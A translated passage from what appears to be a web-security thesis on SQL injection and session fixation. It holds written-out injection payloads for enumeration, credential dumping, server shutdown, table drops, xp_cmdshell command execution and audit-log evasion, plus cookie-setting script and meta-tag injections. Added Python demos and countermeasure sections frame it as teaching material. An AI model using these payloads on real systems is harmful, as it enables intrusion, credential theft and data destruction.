StrSQL = "SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "'"


III.3. Attacks based on the HAVING clause

HAVING, used together with GROUP BY, is an effective way to obtain information about tables and fields; it is explored further in section III.4.

III.4. Attacks based on the UNION operator

The SELECT statement retrieves information from the database. The usual place where input is inserted into a SELECT is after WHERE. To return more rows from the table, the WHERE condition is changed by appending UNION SELECT.

Example 6.III.4-1:

StrSQL = "SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "' UNION SELECT tkPassword from User"

This statement returns a result set combining tkUsername with tkPassword from the User table.

Note:

The column counts of the two SELECTs must match, that is, the original SELECT and the appended UNION SELECT must have the same number of columns, and the columns must be of compatible types.

The syntax error returned after appending the UNION statement reveals the type of each field.
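The login bypass of III.1 and the UNION extraction of III.4, as one added example that is not part of the thesis, run against an in-memory SQLite database so that the reader can execute it without SQL Server. The rows are constructed (their names echo the thesis's error messages); the vulnerable functions rebuild the ASP concatenation in Python, and each is paired with the parameterised form that a practitioner would write instead.

```python
import sqlite3

# Constructed sample rows; the names follow those in the thesis's error messages.
SAMPLE_USERS = [
    ("admin", "passOfAdmin"),
    ("nhimmap", "passofnhimmap"),
    ("minhthu", "passofminhthu"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE User (tkUsername TEXT PRIMARY KEY, tkPassword TEXT)")
    conn.executemany("INSERT INTO User VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username: str, password: str):
    # String concatenation exactly as in the ASP snippet of example 6.III.1-1.
    query = ("SELECT tkUsername FROM User WHERE tkUsername='" + username
             + "' AND tkPassword='" + password + "'")
    return conn.execute(query).fetchone()          # a row means "logged in"


def login_safe(conn, username: str, password: str):
    # Bound parameters: the driver sends data separately from the SQL text, so a
    # quote or comment marker in the input can never alter the statement.
    query = "SELECT tkUsername FROM User WHERE tkUsername=? AND tkPassword=?"
    return conn.execute(query, (username, password)).fetchone()


def search_vulnerable(conn, name: str) -> list:
    # The LIKE search of example 6.III.2-4, built by concatenation.
    query = "SELECT tkUsername FROM User WHERE tkUsername LIKE '%" + name + "'"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn, name: str) -> list:
    query = "SELECT tkUsername FROM User WHERE tkUsername LIKE ?"
    return [row[0] for row in conn.execute(query, ("%" + name,))]


# The thesis's payloads: III.1's two login bypasses and III.4's UNION dump.
BYPASS_OR = "' OR ''='"
BYPASS_COMMENT = "admin'--"
UNION_DUMP = "' UNION SELECT tkPassword FROM User--"
```

Against the concatenated queries, BYPASS_OR logs in as whichever row comes first and BYPASS_COMMENT logs in as admin, while UNION_DUMP makes the search return every password alongside the usernames; the parameterised versions treat the same strings as literal data and return nothing. (SQLite's Python driver refuses stacked statements, so the '; drop table' payload of example 6.III.1-2 cannot be reproduced here; that is a property of this driver, not a defence to rely on.)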


The following examples use HAVING, GROUP BY and UNION to proceed without knowing the contents of the database:

Example 6.III.4-2: recall the login query:

SQLQuery = "SELECT tkUsername, tkPassword FROM User WHERE tkUsername='" & strUsername & "' AND tkPassword='" & strPassword & "'"

First, to learn the table and field names the query uses, use a HAVING condition, as in the following example.

Input:

Username: ' having 1=1--

Error raised:

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

This error reveals that the table used in the query is User and that it has a field named tkUsername.

Next use GROUP BY:

Example 6.III.4-3:

Username: ' group by User.tkUsername having 1=1--


Error raised:

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkPassword' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

So tkPassword is a field of the User table and is used in the query.

Keep adding fields to the GROUP BY until every field of User that takes part in the query is known. Once no more GROUP BY syntax errors appear, move on to checking the type of each field. For this UNION is used:

Example 6.III.4-4:

Username: ' union select sum(tkUsername) from User--

sum computes the total of the argument in parentheses, which must be numeric. If the argument is not numeric, the following error is raised:

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

With this error message, tkUsername must be of type varchar.


With this method the type of every field in the table is easily determined. With that information the hacker can easily add his own data to the User table.

Example 6.III.4-5:

Username: '; insert into User(tkUsername,tkPassword) values ('admin','')--

By entering this, the hacker becomes an administrator without needing an authenticated password (the insert only succeeds if no row with that primary key exists yet).

Example 6.III.4-6 shows a procedure that lets the hacker read everything in the User table:

Step 1: Create a stored procedure that copies all the tkUsername and tkPassword values of the User table into a single string in a new table foo with one column, ret:

create proc test
as
begin
    declare @ret varchar(8000)
    set @ret=':'
    select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
    select @ret as ret into foo
end

Execute it by entering into the form:

Username: '; Create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo end--

Step 2: Call the stored procedure

Once the stored procedure exists, call it:

Username: '; exec test--

Step 3: Use UNION to view the contents of foo

Username: '; select ret,1 from foo union select 1,1 from foo--

Error raised:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu' to a column of data type int.

After these steps the hacker has obtained the contents of the User table: the tkUsername names and the tkPassword passwords.

Step 4: The hacker can also carefully drop the foo table to remove his traces:

Username: '; drop table foo--

Example 6.III.4-7: another way to determine the contents of the User table is the following search method:

Step 1: Walk through the User table row by row

Username: ' union select 1,1--


or:

Username: ' union select min(tkUsername),1 from User where tkUsername > 'a'--

Error raised:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.

The first user in the User table is admin.

Step 2: To learn the next values, enter:

Username: '; select min(tkUsername),1 from User where tkUsername > 'admin' union select 1,1 from User--

Error raised:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'nhimmap' to a column of data type int.

Step 3: Repeat Step 2, each time with the last name found, to obtain every row of the tkUsername field in the User table.


Step 4: To learn the tkPassword values, proceed as follows:

Username: '; select tkPassword,1 from User where tkUsername='admin' union select 1,1 from User--

Error raised:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'passOfAdmin' to a column of data type int.

To learn about the tables and columns in the database, the system view INFORMATION_SCHEMA.TABLES can be queried.

Example 6.III.4-8:

select TABLE_NAME from INFORMATION_SCHEMA.TABLES

INFORMATION_SCHEMA.TABLES holds one row for every table in the current database; its TABLE_NAME column holds the name of each table.

SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'

This statement is used to learn the columns of a table.

UNION can also be used to read SQL Server's environment variables.


    Example 6.III.4-9: To find out which server the application is running on, use:

    Username: ';select @@SERVERNAME union select 1

    Resulting error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'KHOAI_NGU' to a column of data type int.

    III.5. Attacks based on the INSERT statement

    The INSERT keyword is used to put information into the database. INSERT statements are typically used for things such as user registration details, guestbooks and so on.

    The ';' and '--' technique is used just as with SELECT, but the injected values must match the number and type of the columns to avoid a syntax error (if the data types cannot be determined, numbers can be supplied for every column).

    Example 6.III.5-1:

    SQLString = "INSERT INTO User VALUES ('" & strUsername & "','" & strName & "','" & strPassWord & "'," & strLimitSize & ")"


    III.6. Attacks based on stored procedures

    Stored procedures are used in web programming to reduce application complexity and to avoid SQL injection attacks. However, a hacker can still abuse stored procedures to attack the system.

    Example 6.III.6-1: The stored procedure sp_login takes two parameters, username and password. If the following is entered:

    Username: nhimmap

    Password: ';shutdown--

    the stored procedure call becomes:

    exec sp_login 'nhimmap','';shutdown--'

    The shutdown command stops SQL Server immediately.

    III.7. Advanced techniques

    III.7.1. Strings without single quotes

    Programmers may protect their applications by stripping out all quotes; the usual way is to replace each single quote with two single quotes.

    Example 6.III.7.1-1:

    Function escape(input)
        input = replace(input, "'", "''")
        escape = input
    End Function


    Clearly, this blocks every attack shown above. However, to produce a string value without using any quotes, the char() function can be used, as in the following example:

    Example 6.III.7.1-2:

    INSERT into User VALUES(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)

    Although the query above (Example 6.III.7.1-3) contains no single quote at all, it still inserts a string into the table, because it is equivalent to:

    INSERT into User VALUES(666,'chris','chris',255)

    A hacker can also choose numeric usernames and passwords to avoid quotes, as in the following example:

    Example 6.III.7.1-4:

    INSERT into User VALUES(667,123,123,0xffff)

    SQL Server converts the numbers to strings automatically.

    III.7.2. Second-order attacks

    Even though the application replaces single quotes, SQL code can still be injected.

    Example 6.III.7.2-1: When registering an account in the application, enter the following username:

    Username: admin'--

    Password: passofadmin


    The application escapes the quote, so the resulting INSERT is:

    INSERT into User VALUES(123, 'admin''--', 'password',0xffff)

    (but the value stored in the database is admin'--)

    Suppose the application lets users change their password. The ASP code is designed to ensure that the user enters the correct old password before setting a new one. The code is as follows:

    username = escape( Request.form("username") );
    oldpassword = escape( Request.form("oldpassword") );
    newpassword = escape( Request.form("newpassword") );

    var rso = Server.CreateObject("ADODB.Recordset");
    var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
    rso.open( sql, cn );

    if (rso.EOF)
    {

    The query that sets the new password is:

    sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"

    rso("username") is the username value returned by the login query, which is admin'--

    The query therefore becomes:


    update users set password = 'password' where username = 'admin'--'

    So the hacker can change admin's password to a value of their own choosing.

    This situation still exists in most large applications today that rely on stripping data. The best solution is to reject bad values rather than repair them. There is a problem, though: some inputs (such as names) legitimately contain these characters, for example O'Brien.

    The best way to handle this is to disallow single quotes in input. If that is not possible, strip and replace them as above. In that case the best approach is to make sure that all data entering an SQL query (including values already stored in the database) is strictly controlled.
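The second-order attack above, replayed in SQLite as an added example (this is not code from the thesis): the first function mirrors the ASP logic and builds the UPDATE from the username read back from the database, the second binds every value as a parameter instead. The table layout, the use of the sqlite3 module and the function names are assumptions.

```python
import sqlite3

def escape(value):
    """Doubles single quotes, like the thesis's escape() function."""
    return value.replace("'", "''")

def make_db():
    """Constructed sample data: the real admin plus an attacker who
    registered the username admin'-- through the escaping INSERT of
    Example 6.III.7.2-1 (the stored value is still admin'--)."""
    cn = sqlite3.connect(":memory:")
    cn.execute("create table users (id integer, username text, password text)")
    cn.execute("insert into users values (1, 'admin', 'passofadmin')")
    attacker_name, attacker_pw = "admin'--", "passofadmin"
    cn.execute("insert into users values (123, '%s', '%s')"
               % (escape(attacker_name), escape(attacker_pw)))
    return cn

def change_password_vulnerable(cn, username, oldpassword, newpassword):
    """Mirrors the ASP code: form inputs are escaped, but the username
    read back from the login row (rso("username")) is concatenated into
    the UPDATE unescaped. Returns the number of rows updated."""
    sql = ("select id, username from users where username = '%s' "
           "and password = '%s'" % (escape(username), escape(oldpassword)))
    row = cn.execute(sql).fetchone()
    if row is None:
        return 0
    stored_username = row[1]          # admin'-- for the attacker's account
    sql = ("update users set password = '%s' where username = '%s'"
           % (escape(newpassword), stored_username))
    # With stored_username = admin'-- this reads
    #   update users set password = '...' where username = 'admin'--'
    # so the comment swallows the closing quote and admin's row is changed.
    return cn.execute(sql).rowcount

def change_password_fixed(cn, username, oldpassword, newpassword):
    """Parameterised statements: every value, including the one read back
    from the database, is bound as data and can never become SQL."""
    row = cn.execute("select id, username from users where username = ? "
                     "and password = ?", (username, oldpassword)).fetchone()
    if row is None:
        return 0
    return cn.execute("update users set password = ? where username = ?",
                      (newpassword, row[1])).rowcount

def password_of(cn, username):
    """Reads a stored password back with a bound parameter."""
    row = cn.execute("select password from users where username = ?",
                     (username,)).fetchone()
    return row[0] if row else None
```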

    Some applications guard against injected queries by limiting the length of input fields. This limit makes some attacks impossible, but it still leaves a hole a hacker can exploit.

    Example 6.III.7.2-2:

    Suppose both username and password are limited to 16 characters. Enter:

    Username: aaaaaaaaaaaaaaa'

    Password: '; shutdown--


    The application replaces the single quote with two single quotes, but because the string is limited to 16 characters the quote that was just added is cut off. The SQL statement becomes:

    select * from users where username='aaaaaaaaaaaaaaa'' and password=''; shutdown--'

    and as a result the username in the statement has the value:

    aaaaaaaaaaaaaaa' and password='
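The order-of-operations bug in Example 6.III.7.2-2, as an added example that is not from the thesis: each builder returns what the application would place between the quotes, and SQLite is asked which string that literal actually denotes. MAX_LEN, the helper names and the use of SQLite as the parser are assumptions.

```python
import sqlite3

MAX_LEN = 16   # the 16-character field limit of Example 6.III.7.2-2 (assumed)
_cn = sqlite3.connect(":memory:")   # used only to parse string literals

def escape(value):
    """Doubles single quotes, like the thesis's escape() function."""
    return value.replace("'", "''")

def escape_then_truncate(value):
    """Vulnerable order: escape first, then cut to the column width.
    When the doubled quote straddles the limit, half of it is cut off,
    which silently undoes the escaping."""
    return escape(value)[:MAX_LEN]

def truncate_then_escape(value):
    """Safe order: cut the raw input first, then escape what remains,
    so a doubled quote can never be split."""
    return escape(value[:MAX_LEN])

def literal_value(body):
    """Wraps body in single quotes and asks SQLite which string the
    literal denotes. None means the literal does not parse, i.e. the
    quoting was broken and the rest of the query would be misread."""
    try:
        return _cn.execute("select '%s'" % body).fetchone()[0]
    except sqlite3.OperationalError:
        return None
```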

    III.7.3. Evading auditing

    SQL Server has a thorough auditing facility, the sp_traceXXX family of procedures, which can record many kinds of event in the database. In particular the T-SQL events log every SQL statement executed on the server. If auditing is enabled, all of the hacker's SQL queries are logged too, so an administrator can see what is happening and quickly work out a response. There is a way around this, however: add the string sp_password to the T-SQL statement, because when the audit encounters this string it records the following instead:

    -- sp_password was found in the text of this event.
    -- The text has been replaced with this comment for security reasons.

    even when sp_password appears inside a comment.

    So to hide every attack query, simply append sp_password after the -- like this:


    Username: admin'--sp_password

    III.7.4. Using extended stored procedures

    III.7.4.1. Using the extended stored procedures built into SQL Server

    If SQL Server is installed with the default settings, it runs as the SYSTEM account, which corresponds to system-level access on Windows. master..xp_cmdshell can then be used to execute commands remotely:

    '; exec master..xp_cmdshell 'ping 10.10.1.2'--

    Try double quotes (") if single quotes (') do not work.

    Below are some extended stored procedures that hackers commonly use to run commands that reveal information on the victim machine:

    xp_availablemedia: displays the drives currently present on the machine
    xp_dirtree: displays all directories, including subdirectories
    xp_loginconfig: retrieves information about the security mode on the server
    xp_makecab: lets the user create archive files on the server (from any file the server can reach)
    xp_ntsec_enumdomain: lists the domains the server can query
    xp_terminate_process: terminates a process given its PID

    III.7.4.2. Using custom extended stored procedures

    With the extended stored procedure API it is a simple task to build an extended stored procedure DLL containing malicious code. The DLL can be uploaded to the server with commands or with various automated transfer techniques, such as an HTTP download or an FTP script.

    Once the DLL is on the server, the hacker can create an extended stored procedure with the following statement:

    Example 6.III.7.4.2-1:

    sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'

    It can then be executed like any ordinary extended stored procedure:

    exec xp_webserver

    When finished, it can be removed with:

    sp_dropextendedproc 'xp_webserver'


    III.7.4.3. Importing a text file into a table

    The bulk insert statement imports data from a text file into a temporary table.

    Example 6.III.7.4.3-1: First create a simple table:

    create table foo (line varchar(8000))

    Then run bulk insert to copy the file's contents into the table.

    Example 6.III.7.4.3-2:

    bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

    The contents of process_login.asp can then be retrieved with the techniques of Example 6.III.7.4-3.

    IV. COUNTERMEASURES

    In most browsers, special characters should be URL-encoded before they are used in an address.

    SQL injection attacks rely on error messages, so the best defence is still not to show error messages to users: replace them with a page designed by the developer whenever an error occurs in the application.

    Check user input carefully and replace characters such as ';' and so on.


    Remove meta characters such as ' " / \ ; and extended characters such as NULL, CR, LF, ... from strings received from:

    o input typed by the user
    o URL parameters
    o cookie values

    For numeric values, convert them to integers before executing the SQL query, or use ISNUMERIC to make sure they are integers.

    Use an encryption algorithm to protect the data.

    IV.1. Data validation

    Validating data is a complex problem that is often not given enough attention in applications. Validation should not be treated as a few functions bolted onto the application; it has to be done in a general and systematic way to achieve its purpose. The summary below discusses data validation, with sample code to illustrate it.

    There are three approaches to the problem:

    1) Try to check and fix the data to make it valid.
    2) Reject invalid data.
    3) Accept only valid data.

    Approach 1 is hard to implement. First, the programmer cannot know every form of invalid data, because invalid data takes many forms.


    Second, there is the problem of second-order SQL injection when data is read back out of the system.

    Approach 2 is defeated in the same cases as approach 1, because invalid data keeps changing as new kinds of attack are developed.

    Approach 3 is better than the other two, but it runs into some limitations in implementation.

    The most secure approach combines 2 and 3. One example of why both are needed is the hyphen in the surname Quentin Bassington-Bassington: the hyphen must be allowed by the definition of valid data, yet the character sequence -- is special in SQL Server.

    For example, with a filter that rejects bad data such as --, select and union, a control function that merely strips single quotes can still be defeated as follows:

    union select @@version--

    Some basic implementations of data-validation functions

    Method 1: Replace single quotes:

    function escape( input )
        input = replace(input, "'", "''")
        escape = input
    end function


    Method 2: Reject invalid data

    function validate_string( input )
        known_bad = array( "select", "insert", "update", "delete", "drop", "--", "'" )
        validate_string = true
        for i = lbound( known_bad ) to ubound( known_bad )
            if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
                validate_string = false
                exit function
            end if
        next
    end function

    Method 3: Accept only valid data

    function validatepassword( input )
        good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        validatepassword = true
        for i = 1 to len( input )
            c = mid( input, i, 1 )
            if ( InStr( good_password_chars, c ) = 0 ) then
                validatepassword = false
                exit function
            end if
        next
    end function
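The three methods above ported to Python, together with the combination of approaches 2 and 3 that the text recommends for a name such as Quentin Bassington-Bassington; this is an added example, not code from the thesis. validate_name and the character set it allows are assumptions.

```python
import re

KNOWN_BAD = ("select", "insert", "update", "delete", "drop", "--", "'")
GOOD_PASSWORD_CHARS = set(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")

def escape(value):
    """Method 1: replace each single quote with two."""
    return value.replace("'", "''")

def validate_string(value):
    """Method 2: reject known-bad substrings, case-insensitively
    (the VBScript version compares with vbTextCompare)."""
    lowered = value.lower()
    return not any(bad in lowered for bad in KNOWN_BAD)

def validate_password(value):
    """Method 3: accept only characters from the allowed set."""
    return all(ch in GOOD_PASSWORD_CHARS for ch in value)

# Combination of 2 and 3 for a person's name (assumed format): letters,
# spaces, hyphens and apostrophes are allowed, so Bassington-Bassington and
# O'Brien pass, but the SQL comment sequence -- is rejected even though a
# single '-' is a valid character. Apostrophes still go through escape()
# before the value reaches a query.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z' -]*")

def validate_name(value):
    """Allow-list check followed by a known-bad check."""
    return NAME_RE.fullmatch(value) is not None and "--" not in value
```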


    IV.2. SQL Server Lockdown

    The thesis also presents a hardening method at the database-administration level. Here is a checklist of tasks for protecting SQL Server:

    Determine how the server can be connected to:
    o Use the Network Utility to check that only the network libraries actually in use are enabled.

    Review every account in SQL Server:
    o Create only low-privilege accounts for applications.
    o Remove accounts that are not needed.
    o Make sure every account has a proper password.

    Review the objects that exist:
    o Many extended stored procedures can be removed safely. If this is done, consider also deleting the .dll files that contain the code of those extended stored procedures.
    o Remove all sample databases such as northwind and pubs.
    o Remove unused stored procedures such as master..xp_cmdshell, xp_startmail, xp_sendmail and sp_makewebtask.

    Review which accounts can access which objects:
    o An application's database account should be granted only the minimum privileges needed to access the objects it uses.


    Check the server's patch level:
    o Several attacks, such as buffer overflows and format string attacks, target this layer.

    Audit the sessions on the server.

    Change "Startup and run SQL Server" to a low-privilege user account in SQL Server Security.

    Remarks:
    - Chapter 6 shows that validating data before processing it is necessary.
    - Besides validating data, the application should encrypt data inside the database and must not emit error pages that report SQL syntax errors, so that a hacker cannot gather information about the database.
    - In parallel with this is the work of the network administrator.


    Chapter 7

    SESSION TAKEOVER

    Contents:

    I. Overview of session IDs

    II. Session fixation

    III. Session theft


    CHAPTER 7: SESSION TAKEOVER

    I. OVERVIEW OF SESSION IDS

    As mentioned in Chapter 2, section III, a session is used to store the working state between the browser and the server. The session ID may be stored in a cookie, embedded in the URL, or placed in a hidden form field. Each storage method has advantages and disadvantages, but in practice the cookie remains the best choice and the safest method.

    Typically, once the user has been authenticated with personal information such as a username and password, the session ID acts as a temporary static password for subsequent requests. This makes the session ID a prime target for hackers. In many cases a hacker obtains a user's valid session ID and uses it to break into their session. XSS is one attack that can capture a session ID stored in a cookie. This kind of attack is called session hijacking.

    Attacks on a session are usually carried out in two main ways:

    Session fixation

    Session theft


    II. SESSION FIXATION

    In a session fixation attack, the hacker fixes the victim's session ID in advance, before the victim logs into the system. Afterwards, the hacker uses this session ID to enter the victim's session.

    Summary of the attack:

    Step 1: Establish a session ID.

    Systems manage sessions in one of two ways:

    + Permissive: any session ID is accepted; if no such session exists, a new session is created with that ID.
    + Strict: only session IDs that were previously registered are accepted.

    With a permissive system the hacker only has to choose any session ID, remember it and reuse it later. With a strict system the hacker has to register a session ID with the application.

    Depending on how sessions are managed, the hacker must keep the session alive until the victim logs into the system. Normally a session does not live forever: the system destroys it automatically if no action is taken for a while (idle timeout) or when its lifetime expires. Hence step 1a: the attacker maintains the session by sending requests to the server.


    Figure 7.II-1: Outline of a session fixation attack on a user

    Step 2: Send this ID to the victim's browser.

    The hacker sends the newly created session ID to the user; depending on the application, the session ID may be passed via the URL, a hidden form field or a cookie. The common attacks are:

    o Fixing the session ID in a URL parameter.
    o Fixing the session ID in a hidden form field.
    o Fixing the session ID in a cookie.

    Step 3: Enter the victim's session.

    Once the victim has logged into the system with the pre-set session ID and has not yet left the application, the hacker uses that session ID to step into the victim's session.
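The two session-management styles of step 1 and the three steps of the attack, modelled in Python as an added example (not code from the thesis); it also shows what issuing a fresh ID at login does to the attack. SessionStore, the policy names and the fixation_attack driver are assumptions.

```python
import secrets

class SessionStore:
    """Minimal server-side session table (assumed design). policy is
    'permissive' (any client-supplied ID is accepted and created on
    demand) or 'strict' (only IDs the store itself issued are accepted)."""

    def __init__(self, policy):
        if policy not in ("permissive", "strict"):
            raise ValueError("unknown policy")
        self.policy = policy
        self.sessions = {}          # session id -> {"user": name or None}

    def new_session(self):
        """Issues an unguessable ID from the OS random source."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def resolve(self, supplied):
        """Called for every request with the ID the client presented
        (URL parameter, hidden field or cookie); returns the ID to use."""
        if supplied in self.sessions:
            return supplied
        if self.policy == "permissive" and supplied:
            self.sessions[supplied] = {"user": None}   # adopts the fixed ID
            return supplied
        return self.new_session()                       # strict: ignore it

    def login(self, sid, user, rotate):
        """Authenticates the user. With rotate=True the pre-login ID is
        discarded and a fresh one issued, so an ID fixed before login
        never becomes an authenticated session."""
        if rotate:
            self.sessions.pop(sid, None)
            sid = self.new_session()
        self.sessions.setdefault(sid, {"user": None})["user"] = user
        return sid

    def user_for(self, sid):
        return self.sessions.get(sid, {}).get("user")

def fixation_attack(policy, rotate_on_login):
    """Replays steps 1-3 against a store with the given settings and
    returns the account the hacker reaches with the fixed ID
    (None when the attack fails)."""
    store = SessionStore(policy)
    # step 1: choose an ID (permissive) or register one (strict)
    fixed = "1234" if policy == "permissive" else store.new_session()
    # step 2: the victim follows the link and presents the fixed ID
    victim_sid = store.resolve(fixed)
    store.login(victim_sid, "victim", rotate=rotate_on_login)
    # step 3: the hacker presents the same fixed ID
    return store.user_for(fixed)
```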


    Figure 7.II-2: Detailed description of a session fixation attack on a user.

    The thesis next presents the ways of delivering the session ID in step 2.


    II.1. Session ID in a URL parameter

    The hacker sends the user a link that asks them to log into the server with a session ID already fixed in the URL.

    Example 7.II.1-1:

    http://online.worldbank.com/login.jsp?sessionid=1234

    Figure 7.II.1-1: Attack through a URL parameter

    1. The hacker opens the bank's online service at online.worldbank.com.
    2. The server issues a session ID that identifies the hacker's session, say 1234.
    3. The hacker then finds a way to send a link to a user who has an account at this bank. Such links usually lead to the bank's account login page, for example http://online.workbank.com/login.jsp?sessionid=1234, to trick the user into working inside the hacker's session. When the user receives this link,
    4. the user is fooled and opens the web application through the hacker's link. Since a session ID (the hacker's) is already present, the server does not create a new one.
    5. The user logs in with their own credentials to manage their account.
    6. The hacker now enters the user's account without logging in, because they share the same session.

    Remarks: This attack requires the application to create a session ID as soon as the user starts using it. It is easily noticed by the user.

    II.2. Session ID in a hidden form field

    This technique is similar to the hidden-field technique: after viewing the page's HTML source and noticing that the session ID is held in a hidden form field, the hacker sends the user a session ID on the URL as above, or a page that looks like the home page but whose hidden field carries the pre-set value.

    Remarks: This method is likewise not very practical and is as easy to detect as the previous one.

    II.3. Session ID in a cookie

    By abusing cookies, the hacker has three ways to deliver a session ID to the victim's browser:

    Use a client-side scripting language (JavaScript, VBScript, ...) to set a cookie in the victim's browser.

    Use a <meta> tag to set the Set-Cookie attribute.

    Use the Set-Cookie header of an HTTP response.


    Specifically:

    a) Setting a cookie in the browser with a scripting language:

    Most browsers support client-side scripting languages such as JavaScript and VBScript. Both can set a cookie in the browser by assigning to document.cookie.

    Example 7.II.3-1:

    http://online.workbank.com/<script>document.cookie="sessionid=1234; domain=.workbank.com";</script>.idc

    In addition, the hacker can set the cookie's lifetime and domain, and this approach suits permissive systems. For example, every host under .workbank.com can read this cookie value.

    b) Using a <meta> tag with the Set-Cookie attribute:

    An application can also set a cookie in the browser with a <meta> tag in the HTML.

    Example 7.II.3-2:

    <meta http-equiv="Set-Cookie" content="sessionid=1234">

    Meta tag injection:

    On systems that check parameters for <script> tags, XSS becomes difficult, so injecting a <meta> tag is a fairly effective way of manipulating cookies. Normally a <meta> tag is placed between <head> and </head>, but it is still processed if it appears anywhere in the HTML page.

    Example 7.III-3:

    http://online.workbank.dom/<meta http-equiv="Set-Cookie" content="sessionid=1234">.idc

    This method has an advantage over XSS in that it is not defeated in IE when scripting languages are disabled in the browser, except for the <meta> tag.

    c) Setting a cookie with the Set-Cookie attribute in the HTTP response header:

    This method sets a cookie in the browser with Set-Cookie in the HTTP header, by way of an attack on the DNS server,

    II.4. Countermeasures

    First, it must be made clear that preventing session fixation attacks is not the responsibility of the web server, since the server only provides the session-management API to the application. Therefore,